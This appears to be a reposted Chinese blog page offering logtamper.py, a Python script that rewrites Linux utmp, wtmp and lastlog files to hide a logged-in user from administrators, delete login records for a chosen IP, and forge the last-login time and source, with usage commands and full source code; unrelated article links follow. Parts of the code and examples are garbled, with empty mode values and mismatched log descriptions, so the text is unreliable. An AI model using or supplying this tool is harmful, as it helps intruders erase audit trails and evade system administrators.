原作者原文:https://blog.csdn.net/qq_27446553/article/details/51434451

躲避管理员who查看

python logtamper.py -m  -u username -i 192.168.0.188

清除指定ip的登录日志

python logtamper.py -m  -u username -i 192.168.0.188

修改上次登录时间地点

python logtamper.py -m  -u username -i 192.168.0.188 -t tty1 -d :::::

这里对-m参数补充说明一下:

-m 操作的模式 固定值,3个可选【1/2/3】

分别是

1:修改当前登陆用户。日志文件:/var/log/wtmp 查看命令:
who
2:清除登陆日志。日志文件:/var/run/utmp 查看命令:
last | more
3、不是清除,是修改覆盖上次的登陆信息,要修改的用户为-u后面的参数,改为后面 -i -t -d的信息。所以,例如,想改root用户,则-u root,-i -t -d随便输入。日志文件:/var/log/lastlog 查看命令:
lastlog

源代码:

#!/usr/bin/env python

# -*- coding:utf-8 -*-

# mail: cn.b4dboy@gmail.com

import os, struct, sys

from pwd import getpwnam

from time import strptime, mktime

from optparse import OptionParser

UTMPFILE = "/var/run/utmp"

WTMPFILE = "/var/log/wtmp"

LASTLOGFILE = "/var/log/lastlog"

LAST_STRUCT = 'I32s256s'

LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)

XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'

XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)

def getXtmp(filename, username, hostname):

    xtmp = ''

    try:

        fp = open(filename, 'rb')

        while True:

            bytes = fp.read(XTMP_STRUCT_SIZE)

            if not bytes:

                break

            data = struct.unpack(XTMP_STRUCT, bytes)

            record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]

            if (record[4] == username and record[5] == hostname):

                continue

            xtmp += bytes

    except:

        showMessage('Cannot open file: %s' % filename)

    finally:

        fp.close()

    return xtmp

def modifyLast(filename, username, hostname, ttyname, strtime):

    try:

        p = getpwnam(username)

    except:

        showMessage('No such user.')

    timestamp = 0

    try:

        str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')

        timestamp = int(mktime(str2time))

    except:

        showMessage('Time format err.')

    data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)

    try:

        fp = open(filename, 'wb')

        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)

        fp.write(data)

    except:

        showMessage('Cannot open file: %s' % filename)

    finally:

        fp.close()

    return True

def showMessage(msg):

    print msg

    exit(-1)

def saveFile(filename, contents):

    try:

        fp = open(filename, 'w+b')

        fp.write(contents)

    except IOError as e:

        showMessage(e)

    finally:

        fp.close()

if __name__ == '__main__':

    usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \

                    logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'

    parser = OptionParser(usage=usage)

    parser.add_option('-m', '--mode', dest='MODE', default='' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')

    parser.add_option('-t', '--ttyname', dest='TTYNAME')

    parser.add_option('-f', '--filename', dest='FILENAME')

    parser.add_option('-u', '--username', dest='USERNAME')

    parser.add_option('-i', '--hostname', dest='HOSTNAME')

    parser.add_option('-d', '--dateline', dest='DATELINE')

    (options, args) = parser.parse_args()

    if len(args) < 3:

        if options.MODE == '':

            if options.USERNAME == None or options.HOSTNAME == None:

                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:

                options.FILENAME = UTMPFILE

            # tamper

            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)

            saveFile(options.FILENAME, newData)

        elif options.MODE == '':

            if options.USERNAME == None or options.HOSTNAME == None:

                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:

                options.FILENAME = WTMPFILE

            # tamper

            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)

            saveFile(options.FILENAME, newData)

        elif options.MODE == '':

            if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:

                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:

                options.FILENAME = LASTLOGFILE

            # tamper

            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)

        else:

            parser.print_help()

python修改linux日志(logtamper.py)的更多相关文章

  1. python修改linux主机ip

    修改虚拟机的主机ip 和hostname import os, sys def conf_ip(ip): iplist = [] f = open("/etc/sysconfig/netwo ...

  2. Linux日志切割方法[Logrotate、python、shell实现方式]

    Linux日志切割方法[Logrotate.python.shell实现方式] ​ 对于Linux系统安全来说,日志文件是极其重要的工具.不知为何,我发现很多运维同学的服务器上都运行着一些诸如每天切分 ...

  3. python批量修改linux主机密码

    +++++++++++++++++++++++++++++++++++++++++++标题:python批量修改Linux服务器密码时间:2019年2月24日内容:基于python实现批量修改linu ...

  4. 批量修改Linux密码脚本(Python)

    搭建环境 centos 7.4 使用脚本 python 批量修改connect用户的密码 生成密码为随机密码 保存为xls文档 #!/usr/bin/env python # -*- coding: ...

  5. python的logging日志模块(二)

    晚上比较懒,直接搬砖了. 1.简单的将日志打印到屏幕   import logging logging.debug('This is debug message') logging.info('Thi ...

  6. Linux 日志切割方法总结--Logrotate

    一.Logrotate 使用方法 对于Linux系统安全来说,日志文件是极其重要的工具.logrotate程序是一个日志文件管理工具.用于分割日志文件,删除旧的日志文件,并创建新的日志文件,起到&qu ...

  7. python实现Linux启动守护进程

    python实现Linux启动守护进程 DaemonClass.py代码: #/usr/bin/env python # -*- coding: utf-8 -*- import sys import ...

  8. Python_基于Python同Linux进行交互式操作实现通过堡垒机访问目标机

    基于Python同Linux进行交互式操作实现通过堡垒机访问目标机   by:授客 QQ:1033553122 欢迎加入全国软件测试交流群:7156436 实现功能 1 测试环境 1 代码实践 2 注 ...

  9. Python开发之日志记录模块:logging

    1 引言 最近在开发一个应用软件,为方便调试和后期维护,在代码中添加了日志,用的是Python内置的logging模块,看了许多博主的博文,颇有所得.不得不说,有许多博主大牛总结得确实很好.似乎我再写 ...

随机推荐

  1. Github标星过万,Python新手100天学习计划。

    大数据文摘编辑部出品 作为目前最火也是最实用的编程语言,Python不仅是新手入门程序界的首选,也逐渐成为了从大厂到小厂,招牌需求list的必要一条. 当然,学Python这件事情,你可能也和文摘菌一 ...

  2. C# Net 通用json转Object(对象)

    C# Net  通用 json 转 Object  对象 C# Net 提取 json 字符串 对象 数组 C# Net json 对象 中有字符串 转为 对象 例如输入:{"1" ...

  3. 【Spring AOP】Spring AOP之如何通过注解的方式实现各种通知类型的AOP操作进阶篇(3)

    一.切入点表达式的各种类型 切入点表达式的作用:限制连接点的匹配(满足时对应的aspect方法会被执行) 1)execution:用于匹配方法执行连接点.Spring AOP用户可能最经常使用exec ...

  4. MySql || 快速创建100w条记录

    平时每个开发者都会讨论数据量大时,sql的优化问题.但是并不是每个人都会有100w的数据量可以用来实战,那么今天我们就自己动手,模拟一个100w数据量的表. 创建原理 其实创建的方法有很多,有快的也有 ...

  5. CNCF LandScape Summary

    CNCF Cloud Native Interactive Landscape 1. App Definition and Development 1. Database Vitess:itess i ...

  6. Cannot execute statement: impossible to write to binary log since BINLOG_FORMAT = STATEMENT and at least one table uses a storage engine limited to row-based logging. InnoDB is limited to row-logging

    1665 - Cannot execute statement: impossible to write to binary log since BINLOG_FORMAT = STATEMENT a ...

  7. 分享:手把手教你如何免费且光荣地使用正版IntelliJ IDEA

    https://mp.weixin.qq.com/s/6nRYmn6gAWFLg3mUIN_ojg TIPS 近日在个人技术讨论QQ群里,谈论到IDEA的那些事儿.有童鞋居然在某电商网站花钱买激活码. ...

  8. CSS布局对齐的小技巧

    类似以上这种对齐怎么做? 很简单,上面是的污水开始的位置是由于被"能源种类"顶着,下面没有字怎么办?最差的办法就是用margin-left,因为在不同的机器上,可能会出现兼容性问题 ...

  9. PATA1031 Hello World for U

    参考代码: #include <cstdio> #include <cstring> int main() { char str[100], ans[40][40]; scan ...

  10. Codeforces Round 564 题解

    很抱歉让标题把您骗进来了. 这是一场打得最失败的div1. 作为一个橙名一题都不会…… 旁边紫名的PB怒切3题,div2的也随便玩玩出了div1b/div2d…… 这名字颜色也太有水分了. 也就只会2 ...